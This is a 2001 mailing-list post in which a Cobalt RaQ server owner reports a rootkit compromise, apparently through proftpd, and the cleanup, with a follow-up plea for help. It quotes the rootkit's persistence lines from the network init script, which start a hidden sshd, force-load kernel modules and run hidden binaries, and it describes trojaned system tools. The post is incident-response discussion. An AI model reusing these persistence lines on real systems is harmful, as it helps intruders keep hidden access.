[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [cobalt-users] Recent Hacks (resolution in sight)
- Subject: Re: [cobalt-users] Recent Hacks (resolution in sight)
- From: "David Conorozzo" <davidc@xxxxxxxxxxxxxxxxx>
- Date: Thu Feb 15 16:26:30 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
I was also hacked... could you send me that perl file? I went through and found that mysql was replaced. But I don't know what else was and I keep getting a message from cron saying that there was an error starting sshd.... I noticed that ls and ps seemed to be replaced and my FTP server was replaced. I got rid of all that stuff and I moved bash and replaced it. Any help you could give me would be great and I am glad to help you if I can.
David Conorozzo
PC Assistance, Inc.
>>> "inc" <inc@xxxxxxxxxxxxx> 02/09/01 07:34AM >>>
thanks to those who maintained email with me today; it's been a great help.
here's my report:
i've successfully (touch wood) used the unhack.pl script recommended by
Steve Bassi via Mike Fritsch.
after running unhack.pl, there's one file that unhack said was neither
hacked (according to its internal MD5 checksums) nor "original" cobalt.
this file, /etc/rc.d/init.d/network contains the following which i would say
is part of the hack.
/usr/bin/ssh2d -q
if test -f "/dev/kmod"; then
/sbin/insmod -f /usr/lib/crth.o
/sbin/insmod -f /usr/lib/crtz.o
fi
if test -f /lib/security/.config/sn ; then
cd /lib/security/.config;./lpsched
fi
touch /var/lock/subsys/network
if test -f "/dev/dos"; then
/usr/lib/lpq
fi
;;
i've not installed ssh2d, and crth.o and crtz.o look damned nasty to me.
note that unhack.pl DOESN'T clear up crtz.o. can anyone shed some light on
the remaining commands there? i've disabled all these lines until i know
what they are. my "network" script was considerably more complicated than
the "network" script included with unhack.tar.gz
i also spent the whole day studying up on cracking and studying the scripts
and binaries that were placed on my raq.
the only weird thing i could find in my logs was an ftp login from korea. i
have not published any ftp site urls anywhere, and this is the only ftp
login i've ever seen in the logs apart from my own, and the 127.0.0.1
entries used by the admin. this ftp login occurred 4 hours before the
rootkit was activated.
so i would think that proftpd was exploited to gain root access.
all log entries bar the ftp one above were cleaned up, but there were
footsteps left behind in /.bash_history which reflected an rcp download from
a us .edu site.
at this point ps, su, all manner of executables are replaced to hide any
unusual activity. flash22 suggested i try "top" -- which lo and behold
turned up all my logins running as "/bin/xlogin" -- which appeared to be a
copy of the original cobalt "/bin/login" .. a file /etc/ld.so.hash seems to
have a crypted password in it. the replaced "/bin/login" was a very small
file next to the original cobalt "/bin/login".
i'm happy to answer any questions on this.
thanks again to those who helped me climb out of the black hole!
--
chris paul
fastmedia.net
_______________________________________________
cobalt-users mailing list
cobalt-users@xxxxxxxxxxxxxxx
To Subscribe or Unsubscribe, please go to:
http://list.cobalt.com/mailman/listinfo/cobalt-users